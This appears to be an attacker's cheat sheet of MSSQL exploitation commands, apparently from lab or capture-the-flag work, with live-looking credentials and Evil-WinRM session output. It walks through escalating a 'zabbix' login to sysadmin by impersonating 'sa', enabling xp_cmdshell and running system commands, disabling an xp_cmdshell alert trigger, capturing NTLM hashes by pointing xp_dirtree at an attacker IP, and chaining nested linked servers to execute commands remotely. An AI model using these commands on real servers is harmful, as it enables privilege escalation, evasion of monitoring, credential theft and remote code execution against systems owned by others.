MSSQL

PowerUpSQL.ps1

#Audit
Invoke-SQLAudit -Instance ZPH-SVRSQL01  -username zabbix -p 'rDhHbBEfh35sMbkY'

#Add the login to the sysadmin server role
Get-SQLQuery -Instance ZPH-SVRSQL01 -Query "EXECUTE AS LOGIN = 'sa'; EXEC SP_ADDSRVROLEMEMBER 'zabbix', 'sysadmin'" -username zabbix -p 'rDhHbBEfh35sMbkY' -verbose
  • to enable xp_cmdshell

#check whether xp_cmdshell is enabled (value_in_use is the setting currently in effect)
Get-SQLQuery -Instance ZPH-SVRSQL01.zsm.local -Query "SELECT value, value_in_use FROM sys.configurations WHERE name='xp_cmdshell';" -username zabbix -p 'rDhHbBEfh35sMbkY' -verbose

#Enable advanced options:
*Evil-WinRM* PS C:\Users\jamie\Documents> Get-SQLQuery -Instance ZPH-SVRSQL01.zsm.local -Query "EXEC sp_configure 'show advanced options',1" -username zabbix -password rDhHbBEfh35sMbkY -Verbose
Verbose: ZPH-SVRSQL01.zsm.local : Connection Success.

#Apply configuration changes:
*Evil-WinRM* PS C:\Users\jamie\Documents> Get-SQLQuery -Instance ZPH-SVRSQL01.zsm.local -Query "RECONFIGURE" -username zabbix -password rDhHbBEfh35sMbkY -Verbose
Verbose: ZPH-SVRSQL01.zsm.local : Connection Success.

#Enable xp_cmdshell:
*Evil-WinRM* PS C:\Users\jamie\Documents> Get-SQLQuery -Instance ZPH-SVRSQL01.zsm.local -Query "EXEC sp_configure 'xp_cmdshell',1" -username zabbix -password rDhHbBEfh35sMbkY -Verbose
Verbose: ZPH-SVRSQL01.zsm.local : Connection Success.

#Apply configuration changes again:
*Evil-WinRM* PS C:\Users\jamie\Documents> Get-SQLQuery -Instance ZPH-SVRSQL01.zsm.local -Query "RECONFIGURE" -username zabbix -password rDhHbBEfh35sMbkY -Verbose
Verbose: ZPH-SVRSQL01.zsm.local : Connection Success.

#Execute system command (whoami):
*Evil-WinRM* PS C:\Users\jamie\Documents> Get-SQLQuery -Instance ZPH-SVRSQL01.zsm.local -Query "EXEC master..xp_cmdshell 'whoami'" -username zabbix -password rDhHbBEfh35sMbkY -Verbose
Verbose: ZPH-SVRSQL01.zsm.local : Connection Success.

output
------
nt service\mssqlserver



*Evil-WinRM* PS C:\Users\jamie\Documents>
  • Linked Server

Get-SQLQuery -Instance ZPH-SVRSQL01 -Query "EXEC sp_linkedservers;" -username zabbix -p 'rDhHbBEfh35sMbkY' -Verbose

MSSQL Client


# to get version
select @@version;

# to get current server
select @@servername

#current user
select suser_name();

#To list server logins
SELECT name FROM master..syslogins

#To list which logins are members of sysadmin
SELECT name,sysadmin FROM master..syslogins
SELECT name FROM master..syslogins WHERE sysadmin = '1';

#List databases
SELECT name FROM master..sysdatabases;

#to check our server-level permissions
SELECT entity_name, permission_name FROM fn_my_permissions(NULL, 'SERVER');

#List table and schema
select table_name,table_schema from flag.INFORMATION_SCHEMA.TABLES;

#To query a different DB in MSSQL, it’s [server].[db].[schema].[table]

#to list server triggers and disable a trigger
select name from sys.server_triggers;
disable trigger ALERT_xp_cmdshell on all server

#If xp_dirtree is enabled, we try to catch NTLM hashes via Responder
xp_dirtree \\10.10.16.7\test
  • Database Link

#List the database links
select * from master..sysservers

#enum links
enum_links

#use Link
use_link [DC02.darkzero.ext];

#List server name
select * from openquery("COMPATIBILITY\POO_CONFIG", 'select @@servername');

#List Version
select * from openquery("COMPATIBILITY\POO_CONFIG", 'select @@version');

#List sysadmin
select * from openquery("COMPATIBILITY\POO_CONFIG", 'SELECT name,sysadmin FROM master..syslogins');

#List Databases
select * from openquery("WEB\CLIENTS", 'SELECT name FROM master..sysdatabases;');

#List tables
SELECT * FROM OPENQUERY("WEB\CLIENTS", 'SELECT * FROM clients.information_schema.tables');
  • nested database links

#try to have POO_CONFIG run a query on POO_PUBLIC (nested openquery)
select * from openquery("COMPATIBILITY\POO_CONFIG",'select * from openquery("COMPATIBILITY\POO_PUBLIC",''select suser_name();'')')

#To check our permissions on POO_PUBLIC through the nested link
select * from openquery("COMPATIBILITY\POO_CONFIG",'select * from openquery("COMPATIBILITY\POO_PUBLIC",''SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''''SERVER'''');'')')

#xp_cmdshell via EXECUTE
EXECUTE('EXECUTE(''xp_cmdshell whoami'') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]
  • Procedure

#List Procedure
SELECT * FROM OPENQUERY("WEB\CLIENTS", 'SELECT name, object_id FROM clients.sys.procedures');

#To check our permission on that procedure (1 = yes, 0 = no)
SELECT * FROM OPENQUERY("WEB\CLIENTS", 'SELECT HAS_PERMS_BY_NAME(''clients.dbo.BackupClients'', ''OBJECT'', ''VIEW DEFINITION'') AS CanViewDefinition');

#To check whether the procedure is encrypted (OBJECT_DEFINITION returns NULL for an encrypted procedure)
SELECT * FROM OPENQUERY("WEB\CLIENTS", 'SELECT OBJECT_NAME(object_id) AS ProcName, OBJECT_DEFINITION(object_id) AS Definition FROM clients.sys.procedures WHERE name = ''BackupClients''');

#to list CLR assemblies in the database
SELECT * FROM OPENQUERY("WEB\CLIENTS", 'SELECT name, assembly_id, clr_name, permission_set_desc, is_visible FROM clients.sys.assemblies');
